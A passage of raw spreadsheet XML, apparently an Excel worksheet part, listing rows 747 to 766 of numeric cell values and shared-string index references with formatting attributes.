        <v>5639</v>
      </c>
      <c r="H747" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I747" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J747" s="12" t="s">
        <v>258</v>
      </c>
      <c r="K747" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L747" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M747" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N747" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O747" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P747" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q747" s="12">
        <v>2.6</v>
      </c>
      <c r="R747" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S747" s="12" t="s">
        <v>5640</v>
      </c>
      <c r="T747" s="12" t="s">
        <v>5641</v>
      </c>
      <c r="U747" s="12" t="s">
        <v>5642</v>
      </c>
      <c r="V747" s="12" t="s">
        <v>3984</v>
      </c>
      <c r="W747" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X747" s="12">
        <v>3</v>
      </c>
      <c r="Y747" s="12" t="s">
        <v>5643</v>
      </c>
    </row>
    <row r="748" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A748" s="12">
        <v>3619</v>
      </c>
      <c r="B748" s="12" t="s">
        <v>28988</v>
      </c>
      <c r="D748" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E748" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F748" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G748" s="12" t="s">
        <v>5650</v>
      </c>
      <c r="H748" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I748" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J748" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K748" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L748" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M748" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N748" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O748" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P748" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q748" s="12">
        <v>2.6</v>
      </c>
      <c r="R748" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S748" s="12" t="s">
        <v>5651</v>
      </c>
      <c r="T748" s="12" t="s">
        <v>57</v>
      </c>
      <c r="U748" s="12" t="s">
        <v>5652</v>
      </c>
      <c r="V748" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W748" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X748" s="12">
        <v>1</v>
      </c>
      <c r="Y748" s="12" t="s">
        <v>5653</v>
      </c>
    </row>
    <row r="749" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A749" s="12">
        <v>3636</v>
      </c>
      <c r="B749" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D749" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F749" s="12" t="s">
        <v>28989</v>
      </c>
      <c r="G749" s="12" t="s">
        <v>5661</v>
      </c>
      <c r="H749" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I749" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J749" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K749" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L749" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M749" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N749" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O749" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P749" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q749" s="12">
        <v>2.6</v>
      </c>
      <c r="R749" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S749" s="12" t="s">
        <v>5662</v>
      </c>
      <c r="T749" s="12" t="s">
        <v>5663</v>
      </c>
      <c r="U749" s="12" t="s">
        <v>5664</v>
      </c>
      <c r="V749" s="12" t="s">
        <v>608</v>
      </c>
      <c r="W749" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X749" s="12">
        <v>3</v>
      </c>
      <c r="Y749" s="12" t="s">
        <v>5665</v>
      </c>
    </row>
    <row r="750" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A750" s="12">
        <v>3643</v>
      </c>
      <c r="B750" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D750" s="12" t="s">
        <v>28990</v>
      </c>
      <c r="E750" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F750" s="12" t="s">
        <v>28991</v>
      </c>
      <c r="G750" s="12" t="s">
        <v>5667</v>
      </c>
      <c r="H750" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I750" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J750" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K750" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L750" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M750" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N750" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O750" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P750" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q750" s="12">
        <v>2.6</v>
      </c>
      <c r="R750" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S750" s="12" t="s">
        <v>5668</v>
      </c>
      <c r="T750" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="U750" s="12" t="s">
        <v>5669</v>
      </c>
      <c r="V750" s="12" t="s">
        <v>5041</v>
      </c>
      <c r="W750" s="12">
        <v>1355</v>
      </c>
      <c r="X750" s="12">
        <v>8</v>
      </c>
      <c r="Y750" s="12" t="s">
        <v>5670</v>
      </c>
    </row>
    <row r="751" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A751" s="12">
        <v>3647</v>
      </c>
      <c r="B751" s="12" t="s">
        <v>28992</v>
      </c>
      <c r="C751" s="12" t="s">
        <v>28993</v>
      </c>
      <c r="D751" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F751" s="12" t="s">
        <v>28994</v>
      </c>
      <c r="G751" s="12" t="s">
        <v>5672</v>
      </c>
      <c r="H751" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I751" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J751" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K751" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L751" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M751" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N751" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O751" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P751" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q751" s="12">
        <v>2.6</v>
      </c>
      <c r="R751" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S751" s="12" t="s">
        <v>5673</v>
      </c>
      <c r="T751" s="12" t="s">
        <v>5674</v>
      </c>
      <c r="U751" s="12" t="s">
        <v>5675</v>
      </c>
      <c r="V751" s="12" t="s">
        <v>2242</v>
      </c>
      <c r="W751" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X751" s="12">
        <v>0</v>
      </c>
      <c r="Y751" s="12" t="s">
        <v>5676</v>
      </c>
    </row>
    <row r="752" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A752" s="12">
        <v>3648</v>
      </c>
      <c r="B752" s="12" t="s">
        <v>28995</v>
      </c>
      <c r="D752" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F752" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G752" s="12" t="s">
        <v>5677</v>
      </c>
      <c r="H752" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I752" s="12" t="s">
        <v>925</v>
      </c>
      <c r="J752" s="12" t="s">
        <v>4370</v>
      </c>
      <c r="K752" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L752" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M752" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N752" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O752" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P752" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q752" s="12">
        <v>2.6</v>
      </c>
      <c r="R752" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S752" s="12" t="s">
        <v>5678</v>
      </c>
      <c r="T752" s="12" t="s">
        <v>5666</v>
      </c>
      <c r="U752" s="12" t="s">
        <v>5679</v>
      </c>
      <c r="V752" s="12" t="s">
        <v>1068</v>
      </c>
      <c r="W752" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X752" s="12">
        <v>1</v>
      </c>
      <c r="Y752" s="12" t="s">
        <v>5680</v>
      </c>
    </row>
    <row r="753" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A753" s="12">
        <v>3652</v>
      </c>
      <c r="B753" s="12" t="s">
        <v>28996</v>
      </c>
      <c r="D753" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="F753" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G753" s="12" t="s">
        <v>5681</v>
      </c>
      <c r="H753" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I753" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J753" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K753" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L753" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M753" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N753" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O753" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P753" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q753" s="12">
        <v>2.6</v>
      </c>
      <c r="R753" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S753" s="12" t="s">
        <v>5682</v>
      </c>
      <c r="T753" s="12" t="s">
        <v>5683</v>
      </c>
      <c r="U753" s="12" t="s">
        <v>3190</v>
      </c>
      <c r="V753" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W753" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X753" s="12">
        <v>8</v>
      </c>
      <c r="Y753" s="12" t="s">
        <v>5684</v>
      </c>
    </row>
    <row r="754" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A754" s="12">
        <v>3669</v>
      </c>
      <c r="B754" s="12" t="s">
        <v>28999</v>
      </c>
      <c r="C754" s="12" t="s">
        <v>29000</v>
      </c>
      <c r="D754" s="12" t="s">
        <v>29001</v>
      </c>
      <c r="E754" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F754" s="12" t="s">
        <v>28998</v>
      </c>
      <c r="G754" s="12" t="s">
        <v>5691</v>
      </c>
      <c r="H754" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I754" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J754" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K754" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L754" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M754" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N754" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O754" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P754" s="12" t="s">
        <v>5692</v>
      </c>
      <c r="Q754" s="12">
        <v>2.6</v>
      </c>
      <c r="R754" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S754" s="12" t="s">
        <v>5693</v>
      </c>
      <c r="T754" s="12" t="s">
        <v>5694</v>
      </c>
      <c r="U754" s="12" t="s">
        <v>5695</v>
      </c>
      <c r="V754" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W754" s="12" t="s">
        <v>5696</v>
      </c>
      <c r="X754" s="12">
        <v>42</v>
      </c>
      <c r="Y754" s="12" t="s">
        <v>5697</v>
      </c>
    </row>
    <row r="755" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A755" s="12">
        <v>3670</v>
      </c>
      <c r="B755" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C755" s="12" t="s">
        <v>28984</v>
      </c>
      <c r="D755" s="12" t="s">
        <v>28981</v>
      </c>
      <c r="E755" s="12" t="s">
        <v>31474</v>
      </c>
      <c r="F755" s="12" t="s">
        <v>29002</v>
      </c>
      <c r="G755" s="12" t="s">
        <v>5698</v>
      </c>
      <c r="H755" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I755" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J755" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K755" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L755" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M755" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N755" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O755" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P755" s="12" t="s">
        <v>5330</v>
      </c>
      <c r="Q755" s="12">
        <v>2.6</v>
      </c>
      <c r="R755" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S755" s="12" t="s">
        <v>5699</v>
      </c>
      <c r="T755" s="12" t="s">
        <v>5700</v>
      </c>
      <c r="U755" s="12" t="s">
        <v>5701</v>
      </c>
      <c r="V755" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W755" s="12" t="s">
        <v>5702</v>
      </c>
      <c r="X755" s="12">
        <v>33</v>
      </c>
      <c r="Y755" s="12" t="s">
        <v>5703</v>
      </c>
    </row>
    <row r="756" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A756" s="12">
        <v>3676</v>
      </c>
      <c r="B756" s="12" t="s">
        <v>29788</v>
      </c>
      <c r="D756" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E756" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F756" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G756" s="12" t="s">
        <v>5709</v>
      </c>
      <c r="H756" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I756" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J756" s="12" t="s">
        <v>363</v>
      </c>
      <c r="K756" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L756" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M756" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N756" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O756" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P756" s="12" t="s">
        <v>5710</v>
      </c>
      <c r="Q756" s="12">
        <v>2.6</v>
      </c>
      <c r="R756" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S756" s="12" t="s">
        <v>5711</v>
      </c>
      <c r="T756" s="12" t="s">
        <v>5247</v>
      </c>
      <c r="U756" s="12" t="s">
        <v>5712</v>
      </c>
      <c r="V756" s="12" t="s">
        <v>1367</v>
      </c>
      <c r="W756" s="12">
        <v>4302</v>
      </c>
      <c r="X756" s="12">
        <v>15</v>
      </c>
      <c r="Y756" s="12" t="s">
        <v>5713</v>
      </c>
    </row>
    <row r="757" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A757" s="12">
        <v>3678</v>
      </c>
      <c r="B757" s="12" t="s">
        <v>29003</v>
      </c>
      <c r="C757" s="12" t="s">
        <v>29004</v>
      </c>
      <c r="D757" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E757" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F757" s="12" t="s">
        <v>29005</v>
      </c>
      <c r="G757" s="12" t="s">
        <v>5714</v>
      </c>
      <c r="H757" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I757" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J757" s="12" t="s">
        <v>1511</v>
      </c>
      <c r="K757" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L757" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M757" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N757" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O757" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P757" s="12" t="s">
        <v>5715</v>
      </c>
      <c r="Q757" s="12">
        <v>2.6</v>
      </c>
      <c r="R757" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S757" s="12" t="s">
        <v>5716</v>
      </c>
      <c r="T757" s="12" t="s">
        <v>5717</v>
      </c>
      <c r="U757" s="12" t="s">
        <v>5718</v>
      </c>
      <c r="V757" s="12" t="s">
        <v>2398</v>
      </c>
      <c r="W757" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X757" s="12">
        <v>15</v>
      </c>
      <c r="Y757" s="12" t="s">
        <v>5719</v>
      </c>
    </row>
    <row r="758" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A758" s="12">
        <v>3680</v>
      </c>
      <c r="B758" s="12" t="s">
        <v>29006</v>
      </c>
      <c r="C758" s="12" t="s">
        <v>29007</v>
      </c>
      <c r="D758" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="F758" s="12" t="s">
        <v>29005</v>
      </c>
      <c r="G758" s="12" t="s">
        <v>5720</v>
      </c>
      <c r="H758" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I758" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J758" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K758" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L758" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M758" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N758" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O758" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P758" s="12" t="s">
        <v>4806</v>
      </c>
      <c r="Q758" s="12">
        <v>2.4</v>
      </c>
      <c r="R758" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S758" s="12" t="s">
        <v>5721</v>
      </c>
      <c r="T758" s="12" t="s">
        <v>5722</v>
      </c>
      <c r="U758" s="12" t="s">
        <v>5723</v>
      </c>
      <c r="V758" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W758" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X758" s="12">
        <v>20</v>
      </c>
      <c r="Y758" s="12" t="s">
        <v>5724</v>
      </c>
    </row>
    <row r="759" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A759" s="12">
        <v>3685</v>
      </c>
      <c r="B759" s="12" t="s">
        <v>29008</v>
      </c>
      <c r="C759" s="12" t="s">
        <v>29009</v>
      </c>
      <c r="D759" s="12" t="s">
        <v>29011</v>
      </c>
      <c r="F759" s="12" t="s">
        <v>29010</v>
      </c>
      <c r="G759" s="12" t="s">
        <v>5725</v>
      </c>
      <c r="H759" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I759" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J759" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K759" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L759" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M759" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N759" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O759" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P759" s="12" t="s">
        <v>4806</v>
      </c>
      <c r="Q759" s="12">
        <v>2.4</v>
      </c>
      <c r="R759" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S759" s="12" t="s">
        <v>5726</v>
      </c>
      <c r="T759" s="12" t="s">
        <v>5722</v>
      </c>
      <c r="U759" s="12" t="s">
        <v>5727</v>
      </c>
      <c r="V759" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W759" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X759" s="12">
        <v>2</v>
      </c>
      <c r="Y759" s="12" t="s">
        <v>5728</v>
      </c>
    </row>
    <row r="760" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A760" s="12">
        <v>3689</v>
      </c>
      <c r="B760" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C760" s="12" t="s">
        <v>29012</v>
      </c>
      <c r="D760" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F760" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G760" s="12" t="s">
        <v>5729</v>
      </c>
      <c r="H760" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I760" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J760" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K760" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L760" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M760" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N760" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O760" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P760" s="12" t="s">
        <v>5330</v>
      </c>
      <c r="Q760" s="12">
        <v>2.6</v>
      </c>
      <c r="R760" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S760" s="12" t="s">
        <v>5730</v>
      </c>
      <c r="T760" s="12" t="s">
        <v>5731</v>
      </c>
      <c r="U760" s="12" t="s">
        <v>5732</v>
      </c>
      <c r="V760" s="12" t="s">
        <v>3095</v>
      </c>
      <c r="W760" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X760" s="12">
        <v>28</v>
      </c>
      <c r="Y760" s="12" t="s">
        <v>5733</v>
      </c>
    </row>
    <row r="761" spans="1:25" x14ac:dyDescent="0.3">
      <c r="A761" s="12">
        <v>3699</v>
      </c>
      <c r="B761" s="12" t="s">
        <v>28341</v>
      </c>
      <c r="C761" s="12" t="s">
        <v>28343</v>
      </c>
      <c r="D761" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E761" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F761" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G761" s="12" t="s">
        <v>5740</v>
      </c>
      <c r="H761" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I761" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J761" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K761" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L761" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M761" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N761" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O761" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P761" s="12" t="s">
        <v>5685</v>
      </c>
      <c r="Q761" s="12">
        <v>2.6</v>
      </c>
      <c r="R761" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S761" s="12" t="s">
        <v>5741</v>
      </c>
      <c r="T761" s="12" t="s">
        <v>5742</v>
      </c>
      <c r="U761" s="12" t="s">
        <v>5743</v>
      </c>
      <c r="V761" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W761" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X761" s="12">
        <v>6</v>
      </c>
      <c r="Y761" s="12" t="s">
        <v>5744</v>
      </c>
    </row>
    <row r="762" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A762" s="12">
        <v>3700</v>
      </c>
      <c r="B762" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D762" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F762" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G762" s="12" t="s">
        <v>5745</v>
      </c>
      <c r="H762" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I762" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J762" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K762" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L762" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M762" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N762" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O762" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P762" s="12" t="s">
        <v>5330</v>
      </c>
      <c r="Q762" s="12">
        <v>2.6</v>
      </c>
      <c r="R762" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S762" s="12" t="s">
        <v>5746</v>
      </c>
      <c r="T762" s="12" t="s">
        <v>5731</v>
      </c>
      <c r="U762" s="12" t="s">
        <v>5747</v>
      </c>
      <c r="V762" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W762" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X762" s="12">
        <v>7</v>
      </c>
      <c r="Y762" s="12" t="s">
        <v>5748</v>
      </c>
    </row>
    <row r="763" spans="1:25" x14ac:dyDescent="0.3">
      <c r="A763" s="12">
        <v>3711</v>
      </c>
      <c r="B763" s="12" t="s">
        <v>29006</v>
      </c>
      <c r="C763" s="12" t="s">
        <v>29013</v>
      </c>
      <c r="D763" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="F763" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G763" s="12" t="s">
        <v>5755</v>
      </c>
      <c r="H763" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I763" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J763" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K763" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L763" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M763" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N763" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O763" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P763" s="12" t="s">
        <v>5685</v>
      </c>
      <c r="Q763" s="12">
        <v>2.6</v>
      </c>
      <c r="R763" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S763" s="12" t="s">
        <v>5756</v>
      </c>
      <c r="T763" s="12" t="s">
        <v>5757</v>
      </c>
      <c r="U763" s="12" t="s">
        <v>5758</v>
      </c>
      <c r="V763" s="12" t="s">
        <v>553</v>
      </c>
      <c r="W763" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X763" s="12">
        <v>7</v>
      </c>
      <c r="Y763" s="12" t="s">
        <v>5759</v>
      </c>
    </row>
    <row r="764" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A764" s="12">
        <v>3725</v>
      </c>
      <c r="B764" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D764" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F764" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G764" s="12" t="s">
        <v>5761</v>
      </c>
      <c r="H764" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I764" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J764" s="12" t="s">
        <v>3068</v>
      </c>
      <c r="K764" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L764" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M764" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N764" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O764" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P764" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q764" s="12">
        <v>2.6</v>
      </c>
      <c r="R764" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S764" s="12" t="s">
        <v>5762</v>
      </c>
      <c r="T764" s="12" t="s">
        <v>5763</v>
      </c>
      <c r="U764" s="12" t="s">
        <v>5764</v>
      </c>
      <c r="V764" s="12" t="s">
        <v>5765</v>
      </c>
      <c r="W764" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X764" s="12">
        <v>2</v>
      </c>
      <c r="Y764" s="12" t="s">
        <v>5766</v>
      </c>
    </row>
    <row r="765" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A765" s="12">
        <v>3743</v>
      </c>
      <c r="B765" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C765" s="12" t="s">
        <v>29014</v>
      </c>
      <c r="D765" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="F765" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G765" s="12" t="s">
        <v>5783</v>
      </c>
      <c r="H765" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I765" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J765" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K765" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L765" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M765" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N765" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O765" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P765" s="12" t="s">
        <v>5784</v>
      </c>
      <c r="Q765" s="12">
        <v>2.6</v>
      </c>
      <c r="R765" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S765" s="12" t="s">
        <v>5785</v>
      </c>
      <c r="T765" s="12" t="s">
        <v>5786</v>
      </c>
      <c r="U765" s="12" t="s">
        <v>5787</v>
      </c>
      <c r="V765" s="12" t="s">
        <v>100</v>
      </c>
      <c r="W765" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X765" s="12">
        <v>4</v>
      </c>
      <c r="Y765" s="12" t="s">
        <v>5788</v>
      </c>
    </row>
    <row r="766" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A766" s="12">
        <v>3762</v>
      </c>
      <c r="B766" s="12" t="s">
        <v>29016</v>
      </c>
